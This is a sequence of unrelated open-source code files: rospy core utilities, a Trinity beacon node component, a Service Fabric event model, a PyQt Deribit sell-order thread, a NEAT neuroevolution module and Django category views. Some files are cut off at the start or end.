warnings.warn("Call to deprecated function %s." % func.__name__,
category=DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__dict__.update(func.__dict__)
return newFunc
#########################################################
# ROSRPC
ROSRPC = "rosrpc://"
def parse_rosrpc_uri(uri):
"""
utility function for parsing ROS-RPC URIs
@param uri: ROSRPC URI
@type uri: str
@return: address, port
@rtype: (str, int)
@raise ParameterInvalid: if uri is not a valid ROSRPC URI
"""
if uri.startswith(ROSRPC):
dest_addr = uri[len(ROSRPC):]
else:
raise ParameterInvalid("Invalid protocol for ROS service URL: %s"%uri)
try:
if '/' in dest_addr:
dest_addr = dest_addr[:dest_addr.find('/')]
dest_addr, dest_port = dest_addr.split(':')
dest_port = int(dest_port)
except:
raise ParameterInvalid("ROS service URL is invalid: %s"%uri)
return dest_addr, dest_port
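# Illustrative example (editor's addition, not part of the rospy source):
# parse_rosrpc_uri('rosrpc://myhost:1234/my_service') returns ('myhost', 1234),
# while a URI that does not start with 'rosrpc://' raises ParameterInvalid.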
#########################################################
# rospy logger
_rospy_logger = logging.getLogger("rospy.internal")
# we keep a separate, non-rosout log file to contain stack traces and
# other sorts of information that scare users but are essential for
# debugging
def rospydebug(msg, *args):
"""Internal rospy client library debug logging"""
_rospy_logger.debug(msg, *args)
def rospyinfo(msg, *args):
"""Internal rospy client library debug logging"""
_rospy_logger.info(msg, *args)
def rospyerr(msg, *args):
"""Internal rospy client library error logging"""
_rospy_logger.error(msg, *args)
def rospywarn(msg, *args):
"""Internal rospy client library warn logging"""
_rospy_logger.warn(msg, *args)
logdebug = logging.getLogger('rosout').debug
logwarn = logging.getLogger('rosout').warning
loginfo = logging.getLogger('rosout').info
logout = loginfo # alias deprecated name
logerr = logging.getLogger('rosout').error
logerror = logerr # alias logerr
logfatal = logging.getLogger('rosout').critical
#########################################################
# CONSTANTS
MASTER_NAME = "master" #master is a reserved node name for the central master
@deprecated
def get_ros_root(required=False, env=None):
"""
Get the value of ROS_ROOT.
@param env: override environment dictionary
@type env: dict
@param required: if True, fails with ROSException
@return: Value of ROS_ROOT environment
@rtype: str
@raise ROSException: if require is True and ROS_ROOT is not set
"""
if env is None:
env = os.environ
ros_root = rospkg.get_ros_root(env)
if required and not ros_root:
raise rospy.exceptions.ROSException('%s is not set'%rospkg.environment.ROS_ROOT)
return ros_root
#########################################################
# API
_uri = None
def get_node_uri():
"""
Get this Node's URI.
@return: this Node's XMLRPC URI
@rtype: str
"""
return _uri
def set_node_uri(uri):
"""set the URI of the local node.
This is an internal API method, it does not actually affect the XMLRPC URI of the Node."""
global _uri
_uri = uri
#########################################################
# Logging
_log_filename = None
def configure_logging(node_name, level=logging.INFO):
"""
Setup filesystem logging for this node
@param node_name: Node's name
    @type node_name: str
@param level: (optional) Python logging level (INFO, DEBUG, etc...). (Default: logging.INFO)
@type level: int
"""
global _log_filename
# #988 __log command-line remapping argument
mappings = get_mappings()
if '__log' in get_mappings():
logfilename_remap = mappings['__log']
filename = os.path.abspath(logfilename_remap)
else:
# fix filesystem-unsafe chars
filename = node_name.replace('/', '_') + '.log'
if filename[0] == '_':
filename = filename[1:]
if not filename:
raise rospy.exceptions.ROSException('invalid configure_logging parameter: %s'%node_name)
_log_filename = rosgraph.roslogging.configure_logging('rospy', level, filename=filename)
class NullHandler(logging.Handler):
def emit(self, record):
pass
# keep logging happy until we have the node name to configure with
logging.getLogger('rospy').addHandler(NullHandler())
#########################################################
# Init/Shutdown/Exit API and Handlers
_client_ready = False
def is_initialized():
"""
Get the initialization state of the local node. If True, node has
been configured.
@return: True if local node initialized
@rtype: bool
"""
return _client_ready
def set_initialized(initialized):
"""
set the initialization state of the local node
@param initialized: True if node initialized
@type initialized: bool
"""
global _client_ready
_client_ready = initialized
_shutdown_lock = threading.RLock()
# _shutdown_flag flags that rospy is in shutdown mode, in_shutdown
# flags that the shutdown routine has started. These are separate
# because 'pre-shutdown' hooks require rospy to be in a non-shutdown
# mode. These hooks are executed during the shutdown routine.
_shutdown_flag = False
_in_shutdown = False
# various hooks to call on shutdown. shutdown hooks are called in the
# shutdown state, preshutdown are called just before entering shutdown
# state, and client shutdown is called before both of these.
_shutdown_hooks = []
_preshutdown_hooks = []
_client_shutdown_hooks = []
# threads that must be joined on shutdown
_shutdown_threads = []
_signalChain = {}
def is_shutdown():
"""
@return: True if shutdown flag has been set
@rtype: bool
"""
return _shutdown_flag
def is_shutdown_requested():
"""
is_shutdown_requested is a state that occurs just before
    is_shutdown. It is initiated when a shutdown request is
received and continues until client shutdown handlers have been
called. After client shutdown handlers have been serviced, the
is_shutdown state becomes true.
@return: True if shutdown has been requested (but possibly not yet initiated)
@rtype: bool
"""
return _in_shutdown
def _add_shutdown_hook(h, hooks):
"""
shared implementation of add_shutdown_hook and add_preshutdown_hook
"""
if type(h) not in [types.FunctionType, types.MethodType]:
raise TypeError("shutdown hook [%s] must be a function: %s"%(h, type(h)))
if _shutdown_flag:
_logger.warn("add_shutdown_hook called after shutdown")
h("already shutdown")
return
with _shutdown_lock:
if hooks is None:
# race condition check, don't log as we are deep into shutdown
return
hooks.append(h)
def _add_shutdown_thread(t):
"""
Register thread that must be joined() on shutdown
"""
if _shutdown_flag:
#TODO
return
with _shutdown_lock:
if _shutdown_threads is None:
# race condition check, don't log as we are deep into shutdown
return
# in order to prevent memory leaks, reap dead threads. The
# last thread may not get reaped until shutdown, but this is
# relatively minor
for other in _shutdown_threads[:]:
if not other.isAlive():
_shutdown_threads.remove(other)
_shutdown_threads.append(t)
def add_client_shutdown_hook(h):
"""
Add client method to invoke when system shuts down. Unlike
L{add_shutdown_hook} and L{add_preshutdown_hooks}, these methods
will be called before any rospy internal shutdown code.
@param h: function that takes in a single string argument (shutdown reason)
@type h: fn(str)
"""
_add_shutdown_hook(h, _client_shutdown_hooks)
def add_preshutdown_hook(h):
"""
Add method to invoke when system shuts down. Unlike
L{add_shutdown_hook}, these methods will be called before any
other shutdown hooks.
@param h: function that takes in a single string argument (shutdown reason)
@type h: fn(str)
"""
_add_shutdown_hook(h, _preshutdown_hooks)
def add_shutdown_hook(h):
"""
Add method to invoke when system shuts down.
Shutdown hooks are called in the order that they are
registered. This is an internal API method that is used to
cleanup. See the client X{on_shutdown()} method if you wish to
register client hooks.
@param h: function that takes in a single string argument (shutdown reason)
@type h: fn(str)
"""
_add_shutdown_hook(h, _shutdown_hooks)
def signal_shutdown(reason):
"""
Initiates shutdown process by signaling objects waiting on _shutdown_lock.
Shutdown and pre-shutdown hooks are invoked.
@param reason: human-readable shutdown reason, if applicable
@type reason: str
"""
global _shutdown_flag, _in_shutdown, _shutdown_lock, _shutdown_hooks
_logger.info("signal_shutdown [%s]"%reason)
if _shutdown_flag or _in_shutdown:
return
with _shutdown_lock:
if _shutdown_flag or _in_shutdown:
return
_in_shutdown = True
# make copy just in case client re-invokes shutdown
for h in _client_shutdown_hooks:
try:
# client shutdown hooks do not accept a reason arg
h()
except:
traceback.print_exc()
del _client_shutdown_hooks[:]
for h in _preshutdown_hooks:
try:
h(reason)
except:
traceback.print_exc()
del _preshutdown_hooks[:]
# now that pre-shutdown hooks have been called, raise shutdown
# flag. This allows preshutdown hooks to still publish and use
# service calls properly
_shutdown_flag = True
for h in _shutdown_hooks:
try:
h(reason)
except Exception as e:
sys.stderr.write("signal_shutdown hook error[%s]\n"%e)
del _shutdown_hooks[:]
threads = _shutdown_threads[:]
for t in threads:
if t.isAlive():
t.join(_TIMEOUT_SHUTDOWN_JOIN)
del _shutdown_threads[:]
try:
rospy.rostime.wallsleep(0.1) #hack for now until we get rid of all the extra threads
except KeyboardInterrupt: pass
def _ros_signal(sig, stackframe):
signal_shutdown("signal-"+str(sig))
prev_handler = _signalChain.get(sig, None)
if prev_handler is not None and not type(prev_handler) == int:
try:
prev_handler(sig, stackframe)
except KeyboardInterrupt:
pass #filter out generic keyboard interrupt handler
def _ros_atexit():
signal_shutdown('atexit')
atexit.register(_ros_atexit)
# #687
def register_signals():
"""
register system signal handlers for SIGTERM and SIGINT
"""
_signalChain[signal.SIGTERM] = signal.signal(signal.SIGTERM, _ros_signal)
_signalChain[signal.SIGINT] = signal.signal(signal.SIGINT, _ros_signal)
# Validators ######################################
def is_topic(param_name):
"""
Validator that checks that parameter is a valid ROS topic name
"""
def validator(param_value, caller_id):
v = valid_name_validator_resolved(param_name, param_value, caller_id)
if param_value == '/':
raise ParameterInvalid("ERROR: parameter [%s] cannot be the global namespace"%param_name)
return v
return validator
def xmlrpcapi(uri):
"""
@return: instance for calling remote server or None if not a valid URI
@rtype: xmlrpclib.ServerProxy
"""
if uri is None:
return None
uriValidate = urlparse.urlparse(uri)
if not uriValidate[0] or not uriValidate[1]:
return None
return xmlrpcclient.ServerProxy(uri)
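# Illustrative example (editor's addition): xmlrpcapi('http://localhost:11311/')
# returns a ServerProxy for the given URI, while xmlrpcapi('not-a-uri') returns
# None because the parsed scheme and netloc are empty.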
|
the-stack_106_12966
|
from argparse import ArgumentParser, _SubParsersAction
import asyncio
import logging
from typing import Set, Tuple
from async_exit_stack import AsyncExitStack
from lahja import EndpointAPI
from libp2p.crypto.keys import KeyPair
from libp2p.crypto.secp256k1 import create_new_key_pair
from eth2.beacon.typing import SubnetId
from p2p.service import BaseService, run_service
from trinity.boot_info import BootInfo
from trinity.config import BeaconAppConfig, TrinityConfig
from trinity.db.beacon.chain import AsyncBeaconChainDB
from trinity.db.manager import DBClient
from trinity.extensibility import AsyncioIsolatedComponent
from trinity.http.apps.validator_api import ValidatorAPIHandler
from trinity.http.handlers.api_handler import APIHandler
from trinity.http.handlers.metrics_handler import MetricsHandler
from trinity.http.main import HTTPServer
from trinity.http.server import HTTPServer as HTTPAppServer
from trinity.protocol.bcc_libp2p.configs import ATTESTATION_SUBNET_COUNT
from trinity.protocol.bcc_libp2p.node import Node
from trinity.protocol.bcc_libp2p.servers import BCCReceiveServer
from trinity.sync.beacon.chain import BeaconChainSyncer
from trinity.sync.common.chain import SyncBlockImporter
from .chain_maintainer import ChainMaintainer
from .slot_ticker import SlotTicker
from .validator_handler import ValidatorHandler
def _load_secp256k1_key_pair_from(trinity_config: TrinityConfig) -> KeyPair:
return create_new_key_pair(trinity_config.nodekey.to_bytes())
class BeaconNodeComponent(AsyncioIsolatedComponent):
name = "Beacon Node"
logger = logging.getLogger("trinity.components.beacon.BeaconNode")
@classmethod
def configure_parser(
cls, arg_parser: ArgumentParser, subparser: _SubParsersAction
) -> None:
arg_parser.add_argument(
"--enable-metrics", action="store_true", help="Enables the Metrics Server"
)
arg_parser.add_argument(
"--metrics-port", type=int, help="Metrics server port", default=8008
)
arg_parser.add_argument(
"--debug-libp2p", action="store_true", help="Enable debug logging of libp2p"
)
arg_parser.add_argument(
"--enable-api", action="store_true", help="Enables the API Server"
)
arg_parser.add_argument(
"--api-port", type=int, help="API server port", default=5005
)
arg_parser.add_argument(
"--bn-only", action="store_true", help="Run with BeaconNode only mode"
)
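        # Illustrative invocation (editor's sketch; only the flag names above come
        # from this component, the executable name may differ per install):
        #   trinity --enable-metrics --metrics-port 8008 --enable-api --api-port 5005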
@property
def is_enabled(self) -> bool:
return self._boot_info.trinity_config.has_app_config(BeaconAppConfig)
@classmethod
async def do_run(cls, boot_info: BootInfo, event_bus: EndpointAPI) -> None:
trinity_config = boot_info.trinity_config
key_pair = _load_secp256k1_key_pair_from(trinity_config)
beacon_app_config = trinity_config.get_app_config(BeaconAppConfig)
base_db = DBClient.connect(trinity_config.database_ipc_path)
if boot_info.args.debug_libp2p:
logging.getLogger("libp2p").setLevel(logging.DEBUG)
else:
logging.getLogger("libp2p").setLevel(logging.INFO)
with base_db:
chain_config = beacon_app_config.get_chain_config()
chain = chain_config.beacon_chain_class(
base_db, chain_config.genesis_config
)
            # TODO: To simplify, subscribe to all subnets
subnets: Set[SubnetId] = set(
SubnetId(subnet_id) for subnet_id in range(ATTESTATION_SUBNET_COUNT)
)
# TODO: Handle `bootstrap_nodes`.
libp2p_node = Node(
key_pair=key_pair,
listen_ip="0.0.0.0",
listen_port=boot_info.args.port,
preferred_nodes=trinity_config.preferred_nodes,
chain=chain,
subnets=subnets,
event_bus=event_bus,
)
receive_server = BCCReceiveServer(
chain=chain,
p2p_node=libp2p_node,
topic_msg_queues=libp2p_node.pubsub.my_topics,
subnets=subnets,
cancel_token=libp2p_node.cancel_token,
)
chain_maintainer = ChainMaintainer(
chain=chain, event_bus=event_bus, token=libp2p_node.cancel_token
)
validator_handler = ValidatorHandler(
chain=chain,
p2p_node=libp2p_node,
event_bus=event_bus,
get_ready_attestations_fn=receive_server.get_ready_attestations,
get_aggregatable_attestations_fn=receive_server.get_aggregatable_attestations,
import_attestation_fn=receive_server.import_attestation,
token=libp2p_node.cancel_token,
)
slot_ticker = SlotTicker(
genesis_slot=chain_config.genesis_config.GENESIS_SLOT,
genesis_time=chain_config.genesis_time,
seconds_per_slot=chain_config.genesis_config.SECONDS_PER_SLOT,
event_bus=event_bus,
token=libp2p_node.cancel_token,
)
syncer = BeaconChainSyncer(
chain_db=AsyncBeaconChainDB(base_db, chain_config.genesis_config),
peer_pool=libp2p_node.handshaked_peers,
block_importer=SyncBlockImporter(chain),
genesis_config=chain_config.genesis_config,
event_bus=event_bus,
token=libp2p_node.cancel_token,
)
metrics_server = HTTPServer(
handler=MetricsHandler.handle(chain)(event_bus),
port=boot_info.args.metrics_port,
)
# NOTE: this API server provides an interface into the beacon node
api_server = HTTPServer(
handler=APIHandler.handle(chain)(event_bus),
port=boot_info.args.api_port,
)
# NOTE: this API server provides an interface between the beacon node and
# any connected validator clients.
validator_api_handler = ValidatorAPIHandler(
chain, event_bus, chain_config.genesis_time
)
validator_api_server = HTTPAppServer(
routes=validator_api_handler.make_routes(), port=30303
)
services: Tuple[BaseService, ...] = (
libp2p_node,
receive_server,
slot_ticker,
syncer,
validator_api_server,
)
if boot_info.args.enable_metrics:
services += (metrics_server,)
if boot_info.args.enable_api:
services += (api_server,)
if boot_info.args.bn_only:
services += (chain_maintainer, validator_handler)
async with AsyncExitStack() as stack:
for service in services:
await stack.enter_async_context(run_service(service))
await asyncio.gather(*(service.cancellation() for service in services))
|
the-stack_106_12967
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .node_event import NodeEvent
class NodeRemovedFromClusterEvent(NodeEvent):
"""Node Removed event.
:param event_instance_id: The identifier for the FabricEvent instance.
:type event_instance_id: str
:param category: The category of event.
:type category: str
:param time_stamp: The time event was logged.
:type time_stamp: datetime
:param has_correlated_events: Shows there is existing related events
available.
:type has_correlated_events: bool
:param kind: Constant filled by server.
:type kind: str
:param node_name: The name of a Service Fabric node.
:type node_name: str
:param node_id: Id of Node.
:type node_id: str
:param node_instance: Id of Node instance.
:type node_instance: long
:param node_type: Type of Node.
:type node_type: str
:param fabric_version: Fabric version.
:type fabric_version: str
:param ip_address_or_fqdn: IP address or FQDN.
:type ip_address_or_fqdn: str
:param node_capacities: Capacities.
:type node_capacities: str
"""
_validation = {
'event_instance_id': {'required': True},
'time_stamp': {'required': True},
'kind': {'required': True},
'node_name': {'required': True},
'node_id': {'required': True},
'node_instance': {'required': True},
'node_type': {'required': True},
'fabric_version': {'required': True},
'ip_address_or_fqdn': {'required': True},
'node_capacities': {'required': True},
}
_attribute_map = {
'event_instance_id': {'key': 'EventInstanceId', 'type': 'str'},
'category': {'key': 'Category', 'type': 'str'},
'time_stamp': {'key': 'TimeStamp', 'type': 'iso-8601'},
'has_correlated_events': {'key': 'HasCorrelatedEvents', 'type': 'bool'},
'kind': {'key': 'Kind', 'type': 'str'},
'node_name': {'key': 'NodeName', 'type': 'str'},
'node_id': {'key': 'NodeId', 'type': 'str'},
'node_instance': {'key': 'NodeInstance', 'type': 'long'},
'node_type': {'key': 'NodeType', 'type': 'str'},
'fabric_version': {'key': 'FabricVersion', 'type': 'str'},
'ip_address_or_fqdn': {'key': 'IpAddressOrFQDN', 'type': 'str'},
'node_capacities': {'key': 'NodeCapacities', 'type': 'str'},
}
def __init__(self, event_instance_id, time_stamp, node_name, node_id, node_instance, node_type, fabric_version, ip_address_or_fqdn, node_capacities, category=None, has_correlated_events=None):
super(NodeRemovedFromClusterEvent, self).__init__(event_instance_id=event_instance_id, category=category, time_stamp=time_stamp, has_correlated_events=has_correlated_events, node_name=node_name)
self.node_id = node_id
self.node_instance = node_instance
self.node_type = node_type
self.fabric_version = fabric_version
self.ip_address_or_fqdn = ip_address_or_fqdn
self.node_capacities = node_capacities
self.kind = 'NodeRemovedFromCluster'
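# Illustrative construction (editor's sketch; every value below is made up):
#   event = NodeRemovedFromClusterEvent(
#       event_instance_id="00000000-0000-0000-0000-000000000000",
#       time_stamp="2019-01-01T00:00:00Z", node_name="_Node_0", node_id="ba001",
#       node_instance=1, node_type="NodeType0", fabric_version="6.4",
#       ip_address_or_fqdn="10.0.0.4", node_capacities="{}")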
|
the-stack_106_12973
|
from PyQt5 import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from deritradeterminal.util.deribit_api import RestClient
from deritradeterminal.managers.ConfigManager import ConfigManager
class ScalpSellThread(QThread):
signeler = pyqtSignal(bool,str,str)
def processOrder(self):
try:
config = ConfigManager.get_config()
client = RestClient(config.tradeApis[self.accountid][0], config.tradeApis[self.accountid][1], ConfigManager.get_config().apiUrl)
client.sell(ConfigManager.get_config().tradeInsturment, float(self.amount), self.price)
self.signeler.emit(True, "Scalp Sell Order Success", "Scalp Sell On Account: " + str(self.accountid) + " For Amount: " + str(self.amount) + " At Price: " + str(self.price))
except Exception as e:
self.signeler.emit(False, "Scalp Sell Order Error" , "Failed to scalp sell on " + str(self.accountid) + " for amount: " + str(self.amount) + "\n" + str(e))
def __init__(self, accountid, price, amount):
QThread.__init__(self)
self.accountid = accountid
self.price = price
self.amount = amount
def run(self):
self.processOrder()
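# Illustrative usage sketch (editor's addition; the account id and the connected
# slot below are hypothetical, not part of this module):
#   worker = ScalpSellThread("main-account", price=9500.0, amount=10)
#   worker.signeler.connect(lambda ok, title, msg: print(ok, title, msg))
#   worker.start()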
|
the-stack_106_12976
|
from dinosaur.utils.data import Data
import random
from dinosaur.neat.network import Network
from dinosaur.neat.network import Gene
from dinosaur.utils import math_helper
# --- Fitness Evaluation ---
# returns the player with the highest fitness
def best_player():
fitnesses = [p.fitness for p in Data.players]
max_f = max(fitnesses)
max_is = [i for i in range(len(fitnesses)) if fitnesses[i] == max_f]
if len(max_is) == 0:
return None
else:
return Data.players[max_is[0]]
# returns the average fitness of a given species
def avg_fitness(specy):
fit_sum = 0.
for (_, f) in specy:
fit_sum += f
return fit_sum / len(specy)
# returns the average fitness of all species
def total_avg_fitness(species):
sum = 0.
for specy in species:
sum += avg_fitness(specy)
return sum
# returns the desired number of children to be created from a certain species, depending on the average fitness of
# all species
def offspring_count(specy, total_avg_fit):
return int(avg_fitness(specy) / total_avg_fit * Data.population_size)
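# Editor's note with illustrative numbers: if Data.population_size is 100 and a
# species has an average fitness of 2.0 while total_avg_fit is 8.0, the species
# is allotted int(2.0 / 8.0 * 100) = 25 offspring.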
# --- Network Differences ---
# for given networks n1 and n2, returns the excess genes of either n1 or n2 in relation to the other,
# depending on which network has the higher maximum innovation number in its genes, and indicates which one that is
def excess_genes(n1, n2):
if len(n1.genes) == 0:
return n2.genes, False
elif len(n2.genes) == 0:
return n1.genes, True
max_inno_nr_1 = max([g.innovation_number for g in n1.genes])
max_inno_nr_2 = max([g.innovation_number for g in n2.genes])
if max_inno_nr_1 < max_inno_nr_2:
first_has_excess = False
ex_genes = [g for g in n2.genes if g.innovation_number > max_inno_nr_1]
else:
first_has_excess = True
ex_genes = [g for g in n1.genes if g.innovation_number > max_inno_nr_2]
return ex_genes, first_has_excess
# returns the genes of given networks n1 and n2 that don't match the other one's
def disjoint_genes(n1, n2):
if len(n1.genes) == 0 or len(n2.genes) == 0:
return [], []
innos_1 = [g.innovation_number for g in n1.genes]
innos_2 = [g.innovation_number for g in n2.genes]
limit = min(max(innos_1), max(innos_2))
dis_genes_1 = [g for g in n1.genes if g.innovation_number <= limit and g.innovation_number not in innos_2]
dis_genes_2 = [g for g in n2.genes if g.innovation_number <= limit and g.innovation_number not in innos_1]
return dis_genes_1, dis_genes_2
# finds all pairs of matching genes across two networks n1 and n2, for each pair randomly selects one of the two,
# and returns the result
def random_matching_genes(n1, n2):
matching_genes = []
for g1 in n1.genes:
m_genes = [g2 for g2 in n2.genes if g1.innovation_number == g2.innovation_number]
if len(m_genes) > 0:
random_i = random.randint(0, 1)
matching_genes.append([g1, m_genes[0]][random_i])
return matching_genes
# returns the difference between two networks based on their excess and disjoint genes and their average weights
def network_dif(n1, n2):
max_size = float(max(len(n1.genes), len(n2.genes)))
if max_size == 0:
return 0.
(ex_genes, _) = excess_genes(n1, n2)
(d_genes_1, d_genes_2) = disjoint_genes(n1, n2)
return Data.excess_weight * len(ex_genes) / max_size + Data.disjoint_weight * (len(d_genes_1)
+ len(d_genes_2)) / max_size + Data.weight_dif_weight * abs((n1.avg_weight() - n2.avg_weight()))
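# Editor's note with illustrative numbers (the weights are hypothetical settings,
# not values taken from Data): with excess_weight = disjoint_weight = 1.0 and
# weight_dif_weight = 0.4, two networks whose larger genome has 10 genes, with
# 2 excess genes, 3 disjoint genes in total and an average-weight gap of 0.5,
# score 1.0 * 2 / 10 + 1.0 * 3 / 10 + 0.4 * 0.5 = 0.7.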
# --- Mutation ---
# performs NEAT evolution on a given set of networks and returns the result
def evolve(nets):
if len(nets) == 0:
print("No networks passed for evolving. Is this intentional?")
return nets
# speciation
species = []
for (net, fitness) in nets:
for specy in species:
(rep, _) = specy[0] # should just fail bluntly if there's no networks in the species
if network_dif(net, rep) <= Data.speciation_threshold:
specy.append((net, fitness))
break
else:
species.append([(net, fitness)])
# cut off the worst half of all species
new_species = []
for specy in species:
cap_index = (len(specy) + 1) // 2
new_specy = sorted(specy, key=lambda af: af[1], reverse=True)[:cap_index]
new_species.append(new_specy)
species = new_species
# remove weak species
new_species = []
total_avg_fit = total_avg_fitness(species)
for specy in species:
if offspring_count(specy, total_avg_fit) >= 1:
new_species.append(specy)
species = new_species
# breed within each species
children = []
total_avg_fit = total_avg_fitness(species)
for specy in species:
off_count = offspring_count(specy, total_avg_fit) - 1
for _ in range(off_count):
children.append(breed(specy))
# randomly add the best of each species until there are enough
while len(children) < Data.population_size - len(species):
(c, _) = random.choice(species)[0]
children.append(c)
# mutate and add unadulterated parents
new_population = mutate(children)
for specy in species:
(c, _) = specy[0]
new_population.append(c)
return new_population
# performs mutation on a given set of networks and keeps track of the innovation numbers used and created in the process
def mutate(nets):
add_gene_mutations = [] # (in neuron, out neuron, innovation nr)
add_neuron_mutations = [] # (in neuron, out neuron, innovation nr in, innovation nr out)
for net in nets:
for gene in net.genes:
if math_helper.random_decision(Data.prob_weight_mut):
if math_helper.random_decision(Data.prob_weight_nudged):
gene.weight = math_helper.sigmoid_weight(gene.weight
+ random.uniform(-Data.weight_nudge_limit, Data.weight_nudge_limit))
else:
gene.weight = random.uniform(-1., 1.)
add_neuron = math_helper.random_decision(Data.prob_new_neuron)
add_gene = math_helper.random_decision(Data.prob_new_gene)
if add_gene:
if not add_neuron:
(in_n, out_n) = net.new_gene_neurons()
weight = random.uniform(-1., 1.)
prev_similar_innovations = [p_inno_nr for (p_in_n, p_out_n, p_inno_nr) in add_gene_mutations
if p_in_n == in_n and p_out_n == out_n]
if len(prev_similar_innovations) > 0:
innovation_number = prev_similar_innovations[0]
else:
Data.current_innovation_number += 1
innovation_number = Data.current_innovation_number
add_gene_mutations.append((in_n, out_n, innovation_number))
net.genes.append(Gene(in_n=in_n, out_n=out_n, weight=weight, enabled=True,
innovation_number=innovation_number))
else:
if add_neuron and len(net.genes) > 0:
split_gene = random.choice(net.genes)
split_gene.enabled = False
new_neuron_number = max(net.all_neurons) + 1
prev_similar_innovations = [(p_inno_nr_in, p_inno_nr_out)
for (p_in_n, p_out_n, p_inno_nr_in, p_inno_nr_out) in add_neuron_mutations
if p_in_n == split_gene.in_n and p_out_n == split_gene.out_n]
if len(prev_similar_innovations) > 0:
(innovation_number_in, innovation_number_out) = prev_similar_innovations[0]
else:
Data.current_innovation_number += 1
innovation_number_in = Data.current_innovation_number
Data.current_innovation_number += 1
innovation_number_out = Data.current_innovation_number
net.genes.append(Gene(in_n=split_gene.in_n, out_n=new_neuron_number, weight=random.uniform(-1., 1.),
enabled=True, innovation_number=innovation_number_in))
net.genes.append(Gene(in_n=new_neuron_number, out_n=split_gene.out_n, weight=random.uniform(-1., 1.),
enabled=True, innovation_number=innovation_number_out))
net.refresh_neuron_list()
return nets
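# Note (editorial clarification): add_gene_mutations and add_neuron_mutations ensure
# that identical structural mutations made within the same mutate() call share an
# innovation number. For example, if two different networks both add a connection
# from neuron 3 to neuron 7 in this call, both new genes reuse the first innovation
# number assigned; the same connection added in a later call gets a fresh number,
# because the bookkeeping lists are rebuilt on every call.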
# --- Reproduction ---
# creates a child from within a species, either through crossover or through simple replication
def breed(specy):
if math_helper.random_decision(Data.prob_crossover):
(n1, _) = random.choice(specy)
(n2, _) = random.choice(specy)
return produce_child(n1, n2)
else:
(n, _) = random.choice(specy)
return n.replicate()
# creates a child from two given networks
def produce_child(n1, n2):
child_genes = random_matching_genes(n1, n2)
(dis_genes_1, _) = disjoint_genes(n1, n2)
(ex_genes, first_has_excess) = excess_genes(n1, n2)
child_genes.extend(dis_genes_1)
if first_has_excess:
child_genes.extend(ex_genes)
return Network(child_genes, n1.add_ins, n1.add_outs)
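# Usage sketch (an editorial illustration, not part of the original module): evolve()
# takes a list of (network, fitness) pairs and returns the next generation of
# networks, so a typical training loop might look roughly like the following, where
# initial_population() and evaluate() are hypothetical helpers supplied elsewhere:
#
#     population = initial_population()
#     for generation in range(100):
#         scored = [(net, evaluate(net)) for net in population]
#         population = evolve(scored)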
|
the-stack_106_12977
|
from __future__ import unicode_literals
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic.edit import FormView
from django.http.response import HttpResponse
from django.views.generic.base import TemplateView
from easydata.category.models import category
from easydata.category.forms import CategoryPostForm
from easydata.func.function_session import initial_form_session_for_custom_field,\
clear_form_session
from easydata.func.function_category import get_category_fid_choices_html,\
get_category_list_html
from easydata.func.function_core import check_login, get_add_icon
from django.contrib import messages
from easydata.constant import HOME_BREAD
from easydata.validator import IntegerValidator
class CategoryPostView(FormView):
template_name = 'category/post.html'
form_class = CategoryPostForm
action = 'new'
category_instance = None
custom_field_css = None
custom_field_errors = []
def __init__(self, *args, **kwargs):
self.breadcrumb = [HOME_BREAD,{'text': _('Category'), 'href': '/category/list/'},]
super(CategoryPostView, self).__init__(*args, **kwargs)
def get(self, *args, **kwargs):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % self.request.get_full_path())
if 'pk' in self.kwargs and self.kwargs['pk'].isdigit():
self.action = 'edit'
self.category_instance = category.objects.get(pk=self.kwargs['pk'])
return super(CategoryPostView, self).get(*args, **kwargs)
def get_initial(self):
initial = super(CategoryPostView, self).get_initial()
if self.action == 'edit':
initial["name"] = self.category_instance.name
CategoryPostForm.fid_choice_html = get_category_fid_choices_html(self.category_instance.fid)
initial["description"] = self.category_instance.description
initial["ctype"] = self.category_instance.ctype
initial["displayorder"] = self.category_instance.displayorder
initial["status"] = self.category_instance.status
else:
CategoryPostForm.fid_choice_html = get_category_fid_choices_html()
return initial
def get_context_data(self, **kwargs):
context = super(CategoryPostView, self).get_context_data(**kwargs)
if self.action == 'edit':
context['head_title_text'] = _('Category Edit')
context['legend_text'] = _('Category Edit')
self.breadcrumb.append({'text': 'Edit'})
else:
context['head_title_text'] = _('New Category')
context['legend_text'] = _('New Category')
self.breadcrumb.append({'text': 'Create'})
context['breadcrumb'] = self.breadcrumb
initial_form_session_for_custom_field(context['form'], self.request.session)
return context
def post(self, *args, **kwargs):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/?next=%s" % self.request.get_full_path())
if 'pk' in self.kwargs and self.kwargs['pk'].isdigit():
self.action = 'edit'
self.category_instance = category.objects.get(pk=self.kwargs['pk'])
return super(CategoryPostView, self).post(*args, **kwargs)
def form_valid(self, form):
if not check_login(self.request) or self.request.user.is_superuser != True:
return redirect("/account/login/")
else:
#validate fid
fid_validator = IntegerValidator(validate_key='fid',
validate_label='father category id',
session=self.request.session,
post=self.request.POST)
fid_validate_result = fid_validator.check()
if fid_validate_result:
cleaned_fid = fid_validator.get_value()
clear_form_session(self.request.session)
else:
self.request.session.modified = True
return redirect(self.request.path)
if self.action == 'new':
cate = category()
cate.fid = cleaned_fid
cate.name = form.cleaned_data.get("name")
cate.description = form.cleaned_data.get("description")
cate.status = form.cleaned_data.get("status")
cate.displayorder = form.cleaned_data.get("displayorder")
cate.ctype = form.cleaned_data.get("ctype")
cate.save()
message_body = _('category is successfully created')
else:
self.category_instance.fid = cleaned_fid
self.category_instance.name = form.cleaned_data.get("name")
self.category_instance.description = form.cleaned_data.get("description")
self.category_instance.status = form.cleaned_data.get("status")
self.category_instance.displayorder = form.cleaned_data.get("displayorder")
self.category_instance.ctype = form.cleaned_data.get("ctype")
self.category_instance.save()
message_body = _('category has been successfully modified')
messages.success(self.request, message_body)
return redirect('/category/list/')
class CategoryListView(TemplateView):
model = category
template_name = 'category/list.html'
def __init__(self, *args, **kwargs):
